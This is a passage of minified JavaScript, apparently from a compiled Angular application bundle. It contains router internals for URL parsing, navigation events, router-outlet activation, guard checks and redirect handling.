dL(t).replace(/%3B/gi,";")}function Tx(t){return dL(t).replace(/\(/g,"%28").replace(/\)/g,"%29").replace(/%26/gi,"&")}function Q4(t){return decodeURIComponent(t)}function mL(t){return Q4(t.replace(/\+/g,"%20"))}function uL(t){return`${Tx(t.path)}${function Ime(t){return Object.keys(t).map(a=>`;${Tx(a)}=${Tx(t[a])}`).join("")}(t.parameters)}`}const Sme=/^[^\/()?;=#]+/;function $4(t){const a=t.match(Sme);return a?a[0]:""}const kme=/^[^=?&#]+/,Ome=/^[^&#]+/;class Lme{constructor(a){this.url=a,this.remaining=a}parseRootSegment(){return this.consumeOptional("/"),""===this.remaining||this.peekStartsWith("?")||this.peekStartsWith("#")?new qn([],{}):new qn([],this.parseChildren())}parseQueryParams(){const a={};if(this.consumeOptional("?"))do{this.parseQueryParam(a)}while(this.consumeOptional("&"));return a}parseFragment(){return this.consumeOptional("#")?decodeURIComponent(this.remaining):null}parseChildren(){if(""===this.remaining)return{};this.consumeOptional("/");const a=[];for(this.peekStartsWith("(")||a.push(this.parseSegment());this.peekStartsWith("/")&&!this.peekStartsWith("//")&&!this.peekStartsWith("/(");)this.capture("/"),a.push(this.parseSegment());let e={};this.peekStartsWith("/(")&&(this.capture("/"),e=this.parseParens(!0));let i={};return this.peekStartsWith("(")&&(i=this.parseParens(!1)),(a.length>0||Object.keys(e).length>0)&&(i[Nn]=new qn(a,e)),i}parseSegment(){const a=$4(this.remaining);if(""===a&&this.peekStartsWith(";"))throw new gi(4009,!1);return this.capture(a),new by(Q4(a),this.parseMatrixParams())}parseMatrixParams(){const a={};for(;this.consumeOptional(";");)this.parseParam(a);return a}parseParam(a){const e=$4(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const n=$4(this.remaining);n&&(i=n,this.capture(i))}a[Q4(e)]=Q4(i)}parseQueryParam(a){const e=function Pme(t){const a=t.match(kme);return a?a[0]:""}(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const c=function Nme(t){const a=t.match(Ome);return a?a[0]:""}(this.remaining);c&&(i=c,this.capture(i))}const n=mL(e),r=mL(i);if(a.hasOwnProperty(n)){let c=a[n];Array.isArray(c)||(c=[c],a[n]=c),c.push(r)}else a[n]=r}parseParens(a){const e={};for(this.capture("(");!this.consumeOptional(")")&&this.remaining.length>0;){const i=$4(this.remaining),n=this.remaining[i.length];if("/"!==n&&")"!==n&&";"!==n)throw new gi(4010,!1);let r;i.indexOf(":")>-1?(r=i.slice(0,i.indexOf(":")),this.capture(r),this.capture(":")):a&&(r=Nn);const c=this.parseChildren();e[r]=1===Object.keys(c).length?c[Nn]:new qn([],c),this.consumeOptional("//")}return e}peekStartsWith(a){return this.remaining.startsWith(a)}consumeOptional(a){return!!this.peekStartsWith(a)&&(this.remaining=this.remaining.substring(a.length),!0)}capture(a){if(!this.consumeOptional(a))throw new gi(4011,!1)}}function Ex(t){return t.segments.length>0?new qn([],{[Nn]:t}):t}function K4(t){const a={};for(const i of Object.keys(t.children)){const r=K4(t.children[i]);(r.segments.length>0||r.hasChildren())&&(a[i]=r)}return function zme(t){if(1===t.numberOfChildren&&t.children[Nn]){const a=t.children[Nn];return new qn(t.segments.concat(a.segments),a.children)}return t}(new qn(t.segments,a))}function _g(t){return t instanceof fg}function Vme(t,a,e,i,n){var r;if(0===e.length)return v1(a.root,a.root,a.root,i,n);const d=function pL(t){if("string"==typeof t[0]&&1===t.length&&"/"===t[0])return new fL(!0,0,t);let a=0,e=!1;const i=t.reduce((n,r,c)=>{if("object"==typeof r&&null!=r){if(r.outlets){const d={};return oc(r.outlets,(T,k)=>{d[k]="string"==typeof T?T.split("/"):T}),[...n,{outlets:d}]}if(r.segmentPath)return[...n,r.segmentPath]}return"string"!=typeof r?[...n,r]:0===c?(r.split("/").forEach((d,T)=>{0==T&&"."===d||(0==T&&""===d?e=!0:".."===d?a++:""!=d&&n.push(d))}),n):[...n,r]},[]);return new fL(e,a,i)}(e);return d.toRoot()?v1(a.root,a.root,new qn([],{}),i,n):function T(q){var Y;const te=function Hme(t,a,e,i){if(t.isAbsolute)return new A1(a.root,!0,0);if(-1===i)return new A1(e,e===a.root,0);return function _L(t,a,e){let i=t,n=a,r=e;for(;r>n;){if(r-=n,i=i.parent,!i)throw new gi(4005,!1);n=i.segments.length}return new A1(i,!1,n-r)}(e,i+(vy(t.commands[0])?0:1),t.numberOfDoubleDots)}(d,a,null===(Y=t.snapshot)||void 0===Y?void 0:Y._urlSegment,q),pe=te.processChildren?Ty(te.segmentGroup,te.index,d.commands):xx(te.segmentGroup,te.index,d.commands);return v1(a.root,te.segmentGroup,pe,i,n)}(null===(r=t.snapshot)||void 0===r?void 0:r._lastPathIndex)}function vy(t){return"object"==typeof t&&null!=t&&!t.outlets&&!t.segmentPath}function Ay(t){return"object"==typeof t&&null!=t&&t.outlets}function v1(t,a,e,i,n){let c,r={};i&&oc(i,(T,k)=>{r[k]=Array.isArray(T)?T.map(q=>`${q}`):`${T}`}),c=t===a?e:hL(t,a,e);const d=Ex(K4(c));return new fg(d,r,n)}function hL(t,a,e){const i={};return oc(t.children,(n,r)=>{i[r]=n===a?e:hL(n,a,e)}),new qn(t.segments,i)}class fL{constructor(a,e,i){if(this.isAbsolute=a,this.numberOfDoubleDots=e,this.commands=i,a&&i.length>0&&vy(i[0]))throw new gi(4003,!1);const n=i.find(Ay);if(n&&n!==aL(i))throw new gi(4004,!1)}toRoot(){return this.isAbsolute&&1===this.commands.length&&"/"==this.commands[0]}}class A1{constructor(a,e,i){this.segmentGroup=a,this.processChildren=e,this.index=i}}function xx(t,a,e){if(t||(t=new qn([],{})),0===t.segments.length&&t.hasChildren())return Ty(t,a,e);const i=function qme(t,a,e){let i=0,n=a;const r={match:!1,pathIndex:0,commandIndex:0};for(;n<t.segments.length;){if(i>=e.length)return r;const c=t.segments[n],d=e[i];if(Ay(d))break;const T=`${d}`,k=i<e.length-1?e[i+1]:null;if(n>0&&void 0===T)break;if(T&&k&&"object"==typeof k&&void 0===k.outlets){if(!CL(T,k,c))return r;i+=2}else{if(!CL(T,{},c))return r;i++}n++}return{match:!0,pathIndex:n,commandIndex:i}}(t,a,e),n=e.slice(i.commandIndex);if(i.match&&i.pathIndex<t.segments.length){const r=new qn(t.segments.slice(0,i.pathIndex),{});return r.children[Nn]=new qn(t.segments.slice(i.pathIndex),t.children),Ty(r,0,n)}return i.match&&0===n.length?new qn(t.segments,{}):i.match&&!t.hasChildren()?wx(t,a,e):i.match?Ty(t,0,n):wx(t,a,e)}function Ty(t,a,e){if(0===e.length)return new qn(t.segments,{});{const i=function Ume(t){return Ay(t[0])?t[0].outlets:{[Nn]:t}}(e),n={};return oc(i,(r,c)=>{"string"==typeof r&&(r=[r]),null!==r&&(n[c]=xx(t.children[c],a,r))}),oc(t.children,(r,c)=>{void 0===i[c]&&(n[c]=r)}),new qn(t.segments,n)}}function wx(t,a,e){const i=t.segments.slice(0,a);let n=0;for(;n<e.length;){const r=e[n];if(Ay(r)){const T=Gme(r.outlets);return new qn(i,T)}if(0===n&&vy(e[0])){i.push(new by(t.segments[a].path,gL(e[0]))),n++;continue}const c=Ay(r)?r.outlets[Nn]:`${r}`,d=n<e.length-1?e[n+1]:null;c&&d&&vy(d)?(i.push(new by(c,gL(d))),n+=2):(i.push(new by(c,{})),n++)}return new qn(i,{})}function Gme(t){const a={};return oc(t,(e,i)=>{"string"==typeof e&&(e=[e]),null!==e&&(a[i]=wx(new qn([],{}),0,e))}),a}function gL(t){const a={};return oc(t,(e,i)=>a[i]=`${e}`),a}function CL(t,a,e){return t==e.path&&mu(a,e.parameters)}class kh{constructor(a,e){this.id=a,this.url=e}}class Ey extends kh{constructor(a,e,i="imperative",n=null){super(a,e),this.type=0,this.navigationTrigger=i,this.restoredState=n}toString(){return`NavigationStart(id: ${this.id}, url: '${this.url}')`}}class Ph extends kh{constructor(a,e,i){super(a,e),this.urlAfterRedirects=i,this.type=1}toString(){return`NavigationEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}')`}}class X4 extends kh{constructor(a,e,i,n){super(a,e),this.reason=i,this.code=n,this.type=2}toString(){return`NavigationCancel(id: ${this.id}, url: '${this.url}')`}}class yL extends kh{constructor(a,e,i,n){super(a,e),this.error=i,this.target=n,this.type=3}toString(){return`NavigationError(id: ${this.id}, url: '${this.url}', error: ${this.error})`}}class jme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=4}toString(){return`RoutesRecognized(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Qme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=7}toString(){return`GuardsCheckStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class $me extends kh{constructor(a,e,i,n,r){super(a,e),this.urlAfterRedirects=i,this.state=n,this.shouldActivate=r,this.type=8}toString(){return`GuardsCheckEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state}, shouldActivate: ${this.shouldActivate})`}}class Kme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=5}toString(){return`ResolveStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Xme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=6}toString(){return`ResolveEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Yme{constructor(a){this.route=a,this.type=9}toString(){return`RouteConfigLoadStart(path: ${this.route.path})`}}class Jme{constructor(a){this.route=a,this.type=10}toString(){return`RouteConfigLoadEnd(path: ${this.route.path})`}}class Zme{constructor(a){this.snapshot=a,this.type=11}toString(){return`ChildActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class eue{constructor(a){this.snapshot=a,this.type=12}toString(){return`ChildActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class tue{constructor(a){this.snapshot=a,this.type=13}toString(){return`ActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class iue{constructor(a){this.snapshot=a,this.type=14}toString(){return`ActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class bL{constructor(a,e,i){this.routerEvent=a,this.position=e,this.anchor=i,this.type=15}toString(){return`Scroll(anchor: '${this.anchor}', position: '${this.position?`${this.position[0]}, ${this.position[1]}`:null}')`}}class ML{constructor(a){this._root=a}get root(){return this._root.value}parent(a){const e=this.pathFromRoot(a);return e.length>1?e[e.length-2]:null}children(a){const e=Ix(a,this._root);return e?e.children.map(i=>i.value):[]}firstChild(a){const e=Ix(a,this._root);return e&&e.children.length>0?e.children[0].value:null}siblings(a){const e=Rx(a,this._root);return e.length<2?[]:e[e.length-2].children.map(n=>n.value).filter(n=>n!==a)}pathFromRoot(a){return Rx(a,this._root).map(e=>e.value)}}function Ix(t,a){if(t===a.value)return a;for(const e of a.children){const i=Ix(t,e);if(i)return i}return null}function Rx(t,a){if(t===a.value)return[a];for(const e of a.children){const i=Rx(t,e);if(i.length)return i.unshift(a),i}return[]}class Oh{constructor(a,e){this.value=a,this.children=e}toString(){return`TreeNode(${this.value})`}}function T1(t){const a={};return t&&t.children.forEach(e=>a[e.value.outlet]=e),a}class vL extends ML{constructor(a,e){super(a),this.snapshot=e,Sx(this,a)}toString(){return this.snapshot.toString()}}function AL(t,a){const e=function nue(t,a){const c=new Y4([],{},{},"",{},Nn,a,null,t.root,-1,{});return new EL("",new Oh(c,[]))}(t,a),i=new zs([new by("",{})]),n=new zs({}),r=new zs({}),c=new zs({}),d=new zs(""),T=new El(i,n,c,d,r,Nn,a,e.root);return T.snapshot=e.root,new vL(new Oh(T,[]),e)}class El{constructor(a,e,i,n,r,c,d,T){var k,q;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null!==(q=null===(k=this.data)||void 0===k?void 0:k.pipe(Xe(Y=>Y[yy])))&&void 0!==q?q:Bi(void 0),this._futureSnapshot=T}get routeConfig(){return this._futureSnapshot.routeConfig}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=this.params.pipe(Xe(a=>M1(a)))),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=this.queryParams.pipe(Xe(a=>M1(a)))),this._queryParamMap}toString(){return this.snapshot?this.snapshot.toString():`Future(${this._futureSnapshot})`}}function TL(t,a="emptyOnly"){const e=t.pathFromRoot;let i=0;if("always"!==a)for(i=e.length-1;i>=1;){const n=e[i],r=e[i-1];if(n.routeConfig&&""===n.routeConfig.path)i--;else{if(r.component)break;i--}}return function oue(t){return t.reduce((a,e)=>{var i;return{params:Object.assign(Object.assign({},a.params),e.params),data:Object.assign(Object.assign({},a.data),e.data),resolve:Object.assign(Object.assign(Object.assign(Object.assign({},e.data),a.resolve),null===(i=e.routeConfig)||void 0===i?void 0:i.data),e._resolvedData)}},{params:{},data:{},resolve:{}})}(e.slice(i))}class Y4{constructor(a,e,i,n,r,c,d,T,k,q,Y,te){var pe;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null===(pe=this.data)||void 0===pe?void 0:pe[yy],this.routeConfig=T,this._urlSegment=k,this._lastPathIndex=q,this._correctedLastPathIndex=null!=te?te:q,this._resolve=Y}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=M1(this.params)),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return`Route(url:'${this.url.map(i=>i.toString()).join("/")}', path:'${this.routeConfig?this.routeConfig.path:""}')`}}class EL extends ML{constructor(a,e){super(e),this.url=a,Sx(this,e)}toString(){return DL(this._root)}}function Sx(t,a){a.value._routerState=t,a.children.forEach(e=>Sx(t,e))}function DL(t){const a=t.children.length>0?` { ${t.children.map(DL).join(", ")} } `:"";return`${t.value}${a}`}function kx(t){if(t.snapshot){const a=t.snapshot,e=t._futureSnapshot;t.snapshot=e,mu(a.queryParams,e.queryParams)||t.queryParams.next(e.queryParams),a.fragment!==e.fragment&&t.fragment.next(e.fragment),mu(a.params,e.params)||t.params.next(e.params),function bme(t,a){if(t.length!==a.length)return!1;for(let e=0;e<t.length;++e)if(!mu(t[e],a[e]))return!1;return!0}(a.url,e.url)||t.url.next(e.url),mu(a.data,e.data)||t.data.next(e.data)}else t.snapshot=t._futureSnapshot,t.data.next(t._futureSnapshot.data)}function Px(t,a){const e=mu(t.params,a.params)&&function Eme(t,a){return pg(t,a)&&t.every((e,i)=>mu(e.parameters,a[i].parameters))}(t.url,a.url);return e&&!(!t.parent!=!a.parent)&&(!t.parent||Px(t.parent,a.parent))}function Dy(t,a,e){if(e&&t.shouldReuseRoute(a.value,e.value.snapshot)){const i=e.value;i._futureSnapshot=a.value;const n=function sue(t,a,e){return a.children.map(i=>{for(const n of e.children)if(t.shouldReuseRoute(i.value,n.value.snapshot))return Dy(t,i,n);return Dy(t,i)})}(t,a,e);return new Oh(i,n)}{if(t.shouldAttach(a.value)){const r=t.retrieve(a.value);if(null!==r){const c=r.route;return c.value._futureSnapshot=a.value,c.children=a.children.map(d=>Dy(t,d)),c}}const i=function cue(t){return new El(new zs(t.url),new zs(t.params),new zs(t.queryParams),new zs(t.fragment),new zs(t.data),t.outlet,t.component,t)}(a.value),n=a.children.map(r=>Dy(t,r));return new Oh(i,n)}}const Ox="ngNavigationCancelingError";function xL(t,a){const{redirectTo:e,navigationBehaviorOptions:i}=_g(a)?{redirectTo:a,navigationBehaviorOptions:void 0}:a,n=wL(!1,0,a);return n.url=e,n.navigationBehaviorOptions=i,n}function wL(t,a,e){const i=new Error("NavigationCancelingError: "+(t||""));return i[Ox]=!0,i.cancellationCode=a,e&&(i.url=e),i}function IL(t){return RL(t)&&_g(t.url)}function RL(t){return t&&t[Ox]}class lue{constructor(){this.outlet=null,this.route=null,this.resolver=null,this.injector=null,this.children=new xy,this.attachRef=null}}let xy=(()=>{class t{constructor(){this.contexts=new Map}onChildOutletCreated(e,i){const n=this.getOrCreateContext(e);n.outlet=i,this.contexts.set(e,n)}onChildOutletDestroyed(e){const i=this.getContext(e);i&&(i.outlet=null,i.attachRef=null)}onOutletDeactivated(){const e=this.contexts;return this.contexts=new Map,e}onOutletReAttached(e){this.contexts=e}getOrCreateContext(e){let i=this.getContext(e);return i||(i=new lue,this.contexts.set(e,i)),i}getContext(e){return this.contexts.get(e)||null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const J4=!1;let Nx=(()=>{class t{constructor(e,i,n,r,c){this.parentContexts=e,this.location=i,this.changeDetector=r,this.environmentInjector=c,this.activated=null,this._activatedRoute=null,this.activateEvents=new Tt,this.deactivateEvents=new Tt,this.attachEvents=new Tt,this.detachEvents=new Tt,this.name=n||Nn,e.onChildOutletCreated(this.name,this)}ngOnDestroy(){var e;(null===(e=this.parentContexts.getContext(this.name))||void 0===e?void 0:e.outlet)===this&&this.parentContexts.onChildOutletDestroyed(this.name)}ngOnInit(){if(!this.activated){const e=this.parentContexts.getContext(this.name);e&&e.route&&(e.attachRef?this.attach(e.attachRef,e.route):this.activateWith(e.route,e.injector))}}get isActivated(){return!!this.activated}get component(){if(!this.activated)throw new gi(4012,J4);return this.activated.instance}get activatedRoute(){if(!this.activated)throw new gi(4012,J4);return this._activatedRoute}get activatedRouteData(){return this._activatedRoute?this._activatedRoute.snapshot.data:{}}detach(){if(!this.activated)throw new gi(4012,J4);this.location.detach();const e=this.activated;return this.activated=null,this._activatedRoute=null,this.detachEvents.emit(e.instance),e}attach(e,i){this.activated=e,this._activatedRoute=i,this.location.insert(e.hostView),this.attachEvents.emit(e.instance)}deactivate(){if(this.activated){const e=this.component;this.activated.destroy(),this.activated=null,this._activatedRoute=null,this.deactivateEvents.emit(e)}}activateWith(e,i){if(this.isActivated)throw new gi(4013,J4);this._activatedRoute=e;const n=this.location,c=e._futureSnapshot.component,d=this.parentContexts.getOrCreateContext(this.name).children,T=new due(e,d,n.injector);if(i&&function mue(t){return!!t.resolveComponentFactory}(i)){const k=i.resolveComponentFactory(c);this.activated=n.createComponent(k,n.length,T)}else this.activated=n.createComponent(c,{index:n.length,injector:T,environmentInjector:null!=i?i:this.environmentInjector});this.changeDetector.markForCheck(),this.activateEvents.emit(this.activated.instance)}}return t.\u0275fac=function(e){return new(e||t)(Ee(xy),Ee(fo),Vr("name"),Ee(Ma),Ee(Ht))},t.\u0275dir=Ot({type:t,selectors:[["router-outlet"]],outputs:{activateEvents:"activate",deactivateEvents:"deactivate",attachEvents:"attach",detachEvents:"detach"},exportAs:["outlet"],standalone:!0}),t})();class due{constructor(a,e,i){this.route=a,this.childContexts=e,this.parent=i}get(a,e){return a===El?this.route:a===xy?this.childContexts:this.parent.get(a,e)}}let Lx=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],standalone:!0,features:[Lk],decls:1,vars:0,template:function(e,i){1&e&&it(0,"router-outlet")},dependencies:[Nx],encapsulation:2}),t})();function SL(t,a){var e;return t.providers&&!t._injector&&(t._injector=Sv(t.providers,a,`Route: ${t.path}`)),null!==(e=t._injector)&&void 0!==e?e:a}function Wx(t){const a=t.children&&t.children.map(Wx),e=a?Object.assign(Object.assign({},t),{children:a}):Object.assign({},t);return!e.component&&!e.loadComponent&&(a||e.loadChildren)&&e.outlet&&e.outlet!==Nn&&(e.component=Lx),e}function xd(t){return t.outlet||Nn}function kL(t,a){const e=t.filter(i=>xd(i)===a);return e.push(...t.filter(i=>xd(i)!==a)),e}function wy(t){var a;if(!t)return null;if(null!==(a=t.routeConfig)&&void 0!==a&&a._injector)return t.routeConfig._injector;for(let e=t.parent;e;e=e.parent){const i=e.routeConfig;if(null!=i&&i._loadedInjector)return i._loadedInjector;if(null!=i&&i._injector)return i._injector}return null}class _ue{constructor(a,e,i,n){this.routeReuseStrategy=a,this.futureState=e,this.currState=i,this.forwardEvent=n}activate(a){const e=this.futureState._root,i=this.currState?this.currState._root:null;this.deactivateChildRoutes(e,i,a),kx(this.futureState.root),this.activateChildRoutes(e,i,a)}deactivateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{const c=r.value.outlet;this.deactivateRoutes(r,n[c],i),delete n[c]}),oc(n,(r,c)=>{this.deactivateRouteAndItsChildren(r,i)})}deactivateRoutes(a,e,i){const n=a.value,r=e?e.value:null;if(n===r)if(n.component){const c=i.getContext(n.outlet);c&&this.deactivateChildRoutes(a,e,c.children)}else this.deactivateChildRoutes(a,e,i);else r&&this.deactivateRouteAndItsChildren(e,i)}deactivateRouteAndItsChildren(a,e){a.value.component&&this.routeReuseStrategy.shouldDetach(a.value.snapshot)?this.detachAndStoreRouteSubtree(a,e):this.deactivateRouteAndOutlet(a,e)}detachAndStoreRouteSubtree(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);if(i&&i.outlet){const c=i.outlet.detach(),d=i.children.onOutletDeactivated();this.routeReuseStrategy.store(a.value.snapshot,{componentRef:c,route:a,contexts:d})}}deactivateRouteAndOutlet(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);i&&i.outlet&&(i.outlet.deactivate(),i.children.onOutletDeactivated(),i.attachRef=null,i.resolver=null,i.route=null)}activateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{this.activateRoutes(r,n[r.value.outlet],i),this.forwardEvent(new iue(r.value.snapshot))}),a.children.length&&this.forwardEvent(new eue(a.value.snapshot))}activateRoutes(a,e,i){var n;const r=a.value,c=e?e.value:null;if(kx(r),r===c)if(r.component){const d=i.getOrCreateContext(r.outlet);this.activateChildRoutes(a,e,d.children)}else this.activateChildRoutes(a,e,i);else if(r.component){const d=i.getOrCreateContext(r.outlet);if(this.routeReuseStrategy.shouldAttach(r.snapshot)){const T=this.routeReuseStrategy.retrieve(r.snapshot);this.routeReuseStrategy.store(r.snapshot,null),d.children.onOutletReAttached(T.contexts),d.attachRef=T.componentRef,d.route=T.route.value,d.outlet&&d.outlet.attach(T.componentRef,T.route.value),kx(T.route.value),this.activateChildRoutes(a,null,d.children)}else{const T=wy(r.snapshot),k=null!==(n=null==T?void 0:T.get(On))&&void 0!==n?n:null;d.attachRef=null,d.route=r,d.resolver=k,d.injector=T,d.outlet&&d.outlet.activateWith(r,d.injector),this.activateChildRoutes(a,null,d.children)}}else this.activateChildRoutes(a,null,i)}}class PL{constructor(a){this.path=a,this.route=this.path[this.path.length-1]}}class Z4{constructor(a,e){this.component=a,this.route=e}}function gue(t,a,e){const i=t._root;return Iy(i,a?a._root:null,e,[i.value])}function E1(t,a){const e=Symbol(),i=a.get(t,e);return i===e?"function"!=typeof t||function t0(t){return null!==Hu(t)}(t)?a.get(t):t:i}function Iy(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=T1(a);return t.children.forEach(c=>{(function yue(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=t.value,c=a?a.value:null,d=e?e.getContext(t.value.outlet):null;if(c&&r.routeConfig===c.routeConfig){const T=function bue(t,a,e){if("function"==typeof e)return e(t,a);switch(e){case"pathParamsChange":return!pg(t.url,a.url);case"pathParamsOrQueryParamsChange":return!pg(t.url,a.url)||!mu(t.queryParams,a.queryParams);case"always":return!0;case"paramsOrQueryParamsChange":return!Px(t,a)||!mu(t.queryParams,a.queryParams);default:return!Px(t,a)}}(c,r,r.routeConfig.runGuardsAndResolvers);T?n.canActivateChecks.push(new PL(i)):(r.data=c.data,r._resolvedData=c._resolvedData),Iy(t,a,r.component?d?d.children:null:e,i,n),T&&d&&d.outlet&&d.outlet.isActivated&&n.canDeactivateChecks.push(new Z4(d.outlet.component,c))}else c&&Ry(a,d,n),n.canActivateChecks.push(new PL(i)),Iy(t,null,r.component?d?d.children:null:e,i,n)})(c,r[c.value.outlet],e,i.concat([c.value]),n),delete r[c.value.outlet]}),oc(r,(c,d)=>Ry(c,e.getContext(d),n)),n}function Ry(t,a,e){const i=T1(t),n=t.value;oc(i,(r,c)=>{Ry(r,n.component?a?a.children.getContext(c):null:a,e)}),e.canDeactivateChecks.push(new Z4(n.component&&a&&a.outlet&&a.outlet.isActivated?a.outlet.component:null,n))}function Sy(t){return"function"==typeof t}function Fx(t){return t instanceof V4||"EmptyError"===(null==t?void 0:t.name)}const e3=Symbol("INITIAL_VALUE");function D1(){return Ur(t=>ug(t.map(a=>a.pipe(Cn(1),Ro(e3)))).pipe(Xe(a=>{for(const e of a)if(!0!==e){if(e===e3)return e3;if(!1===e||e instanceof fg)return e}return!0}),Dn(a=>a!==e3),Cn(1)))}function OL(t){return function v(...t){return P(t)}(qr(a=>{if(_g(a))throw xL(0,a)}),Xe(a=>!0===a))}const Vx={matched:!1,consumedSegments:[],remainingSegments:[],parameters:{},positionalParamSegments:{}};function NL(t,a,e,i,n){const r=Bx(t,a,e);return r.matched?function zue(t,a,e,i){const n=a.canMatch;return n&&0!==n.length?Bi(n.map(c=>{const d=E1(c,t);return cp(function Due(t){return t&&Sy(t.canMatch)}(d)?d.canMatch(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL()):Bi(!0)}(i=SL(a,i),a,e).pipe(Xe(c=>!0===c?r:Object.assign({},Vx))):Bi(r)}function Bx(t,a,e){var i;if(""===a.path)return"full"===a.pathMatch&&(t.hasChildren()||e.length>0)?Object.assign({},Vx):{matched:!0,consumedSegments:[],remainingSegments:e,parameters:{},positionalParamSegments:{}};const r=(a.matcher||yme)(e,t,a);if(!r)return Object.assign({},Vx);const c={};oc(r.posParams,(T,k)=>{c[k]=T.path});const d=r.consumed.length>0?Object.assign(Object.assign({},c),r.consumed[r.consumed.length-1].parameters):c;return{matched:!0,consumedSegments:r.consumed,remainingSegments:e.slice(r.consumed.length),parameters:d,positionalParamSegments:null!==(i=r.posParams)&&void 0!==i?i:{}}}function t3(t,a,e,i,n="corrected"){if(e.length>0&&function Vue(t,a,e){return e.some(i=>a3(t,a,i)&&xd(i)!==Nn)}(t,e,i)){const c=new qn(a,function Fue(t,a,e,i){const n={};n[Nn]=i,i._sourceSegment=t,i._segmentIndexShift=a.length;for(const r of e)if(""===r.path&&xd(r)!==Nn){const c=new qn([],{});c._sourceSegment=t,c._segmentIndexShift=a.length,n[xd(r)]=c}return n}(t,a,i,new qn(e,t.children)));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:[]}}if(0===e.length&&function Bue(t,a,e){return e.some(i=>a3(t,a,i))}(t,e,i)){const c=new qn(t.segments,function Wue(t,a,e,i,n,r){const c={};for(const d of i)if(a3(t,e,d)&&!n[xd(d)]){const T=new qn([],{});T._sourceSegment=t,T._segmentIndexShift="legacy"===r?t.segments.length:a.length,c[xd(d)]=T}return Object.assign(Object.assign({},n),c)}(t,a,e,i,t.children,n));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:e}}const r=new qn(t.segments,t.children);return r._sourceSegment=t,r._segmentIndexShift=a.length,{segmentGroup:r,slicedSegments:e}}function a3(t,a,e){return(!(t.hasChildren()||a.length>0)||"full"!==e.pathMatch)&&""===e.path}function LL(t,a,e,i){return!!(xd(t)===i||i!==Nn&&a3(a,e,t))&&("**"===t.path||Bx(a,t,e).matched)}function zL(t,a,e){return 0===a.length&&!t.children[e]}const n3=!1;class o3{constructor(a){this.segmentGroup=a||null}}class WL{constructor(a){this.urlTree=a}}function ky(t){return b1(new o3(t))}function FL(t){return b1(new WL(t))}class Gue{constructor(a,e,i,n,r){this.injector=a,this.configLoader=e,this.urlSerializer=i,this.urlTree=n,this.config=r,this.allowRedirects=!0}apply(){const a=t3(this.urlTree.root,[],[],this.config).segmentGroup,e=new qn(a.segments,a.children);return this.expandSegmentGroup(this.injector,this.config,e,Nn).pipe(Xe(r=>this.createUrlTree(K4(r),this.urlTree.queryParams,this.urlTree.fragment))).pipe(Sh(r=>{if(r instanceof WL)return this.allowRedirects=!1,this.match(r.urlTree);throw r instanceof o3?this.noMatchError(r):r}))}match(a){return this.expandSegmentGroup(this.injector,this.config,a.root,Nn).pipe(Xe(n=>this.createUrlTree(K4(n),a.queryParams,a.fragment))).pipe(Sh(n=>{throw n instanceof o3?this.noMatchError(n):n}))}noMatchError(a){return new gi(4002,n3)}createUrlTree(a,e,i){const n=Ex(a);return new fg(n,e,i)}expandSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.expandChildren(a,e,i).pipe(Xe(r=>new qn([],r))):this.expandSegment(a,i,e,i.segments,n,!0)}expandChildren(a,e,i){const n=[];for(const r of Object.keys(i.children))"primary"===r?n.unshift(r):n.push(r);return Sa(n).pipe(Rh(r=>{const c=i.children[r],d=kL(e,r);return 